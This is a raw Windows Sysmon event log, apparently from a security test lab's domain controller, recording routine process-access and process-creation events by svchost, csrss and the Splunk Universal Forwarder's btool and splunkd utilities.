10341000x80000000000000001963Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:18.376{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001962Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:18.376{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001961Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:18.376{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001960Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:18.376{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001959Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:18.376{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-8E5A-6005-4F00-00000000A301}3456C:\Program Files\SplunkUniversalForwarder\bin\btool.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000001958Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:18.376{59A5CD1D-8E59-6005-4800-00000000A301}39683972C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe{59A5CD1D-8E5A-6005-4F00-00000000A301}3456C:\Program Files\SplunkUniversalForwarder\bin\btool.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+4022c|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+403f8|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+404c7|C:\Program 
Files\SplunkUniversalForwarder\bin\splunk.exe+40fee|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+13671|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+181c6|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+1adfc|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+4cf68|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000001957Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:18.378{59A5CD1D-8E5A-6005-4F00-00000000A301}3456C:\Program Files\SplunkUniversalForwarder\bin\btool.exe8.0.2btoolsplunk ApplicationSplunk Inc.btool.exe"C:\Program Files\SplunkUniversalForwarder\bin\btool" validate-regex --log-warningsC:\Windows\system32\NT AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=BC53EBF68CFA6E8A254D89ABEC89A65D,SHA256=97024B4A7182D9C253B1AC4E56A1C8F3BC8808B79E6D022EF27B95003622F0A4,IMPHASH=572E0CF4672412FA940B0E1835926B3B{59A5CD1D-8E59-6005-4800-00000000A301}3968C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe" _internal pre-flight-checks --answer-yes --no-prompt 10341000x80000000000000001956Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:18.330{59A5CD1D-8E5A-6005-4E00-00000000A301}34683444C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE{59A5CD1D-8E56-6005-3000-00000000A301}2532C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+116e675|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+116e1a6|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+f344c|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+f2a91|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+19fdb50|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 
10341000x80000000000000001955Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:18.095{59A5CD1D-8E58-6005-3A00-00000000A301}36643684C:\Windows\system32\conhost.exe{59A5CD1D-8E5A-6005-4E00-00000000A301}3468C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001954Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:18.080{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001953Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:18.080{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001952Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:18.080{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001951Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:18.080{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001950Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:18.080{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001949Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:18.080{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001948Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:18.080{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001947Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:18.080{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001946Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:18.080{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-8E5A-6005-4E00-00000000A301}3468C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000001945Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:18.080{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001944Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:18.080{59A5CD1D-8E5A-6005-4D00-00000000A301}34283432C:\Program Files\SplunkUniversalForwarder\bin\btool.exe{59A5CD1D-8E5A-6005-4E00-00000000A301}3468C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+239c|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+2568|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+2926|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+11cf|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+1245|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+aa24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000001943Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:18.093{59A5CD1D-8E5A-6005-4E00-00000000A301}3468C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe8.0.2splunkd servicesplunk 
ApplicationSplunk Inc.splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE" btool validate-strptime --log-warningsC:\Windows\system32\NT AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=B6D66AB97239BFB32F1CC9B8BFE1B4E0,SHA256=9D5EC3AA587B29840BE53E8E11B1C3BFE2FA3413DD65459325CBEEAFA66D3975,IMPHASH=CD69F86EE9B3C12390F5C7499BD3A589{59A5CD1D-8E5A-6005-4D00-00000000A301}3428C:\Program Files\SplunkUniversalForwarder\bin\btool.exe"C:\Program Files\SplunkUniversalForwarder\bin\btool" validate-strptime --log-warnings 10341000x80000000000000001942Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:18.080{59A5CD1D-8E58-6005-3A00-00000000A301}36643684C:\Windows\system32\conhost.exe{59A5CD1D-8E5A-6005-4D00-00000000A301}3428C:\Program Files\SplunkUniversalForwarder\bin\btool.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001941Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:18.080{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001940Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:18.080{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001939Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:18.080{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001938Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:18.080{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001937Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:18.080{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001936Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 